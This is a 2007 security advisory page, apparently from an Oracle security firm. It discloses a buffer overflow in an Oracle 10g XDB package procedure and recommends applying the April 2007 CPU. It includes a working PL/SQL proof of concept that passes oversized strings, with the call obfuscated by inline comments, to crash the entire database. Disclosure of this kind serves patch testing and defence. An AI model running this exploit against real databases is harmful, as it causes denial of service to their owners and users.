|
Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)
Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
|
Crash entire database via SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10g
| Name |
Crash entire database via SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10g
|
| Systems Affected |
Oracle 10g |
| Severity |
High Risk |
| Category |
Buffer Overflow |
| Vendor URL |
http://www.oracle.com/ |
| Credit |
Anonymous |
| Exploit |
Full Disclosure |
| Date |
2 Nov 2007 (V 1.00) |
Details
Buffer Overflow in SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA
Example
SQL>-- Crash Database
declare
larry varchar2(32767);
mary varchar2(32767);
begin
larry:='larryellison';
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
mary:='maryann';
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
xDb
/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary , larry);
end;
/
Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2007 or later)
© 2007 by Red-Database-Security GmbH - last update 28-nov-2007
|
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.
|
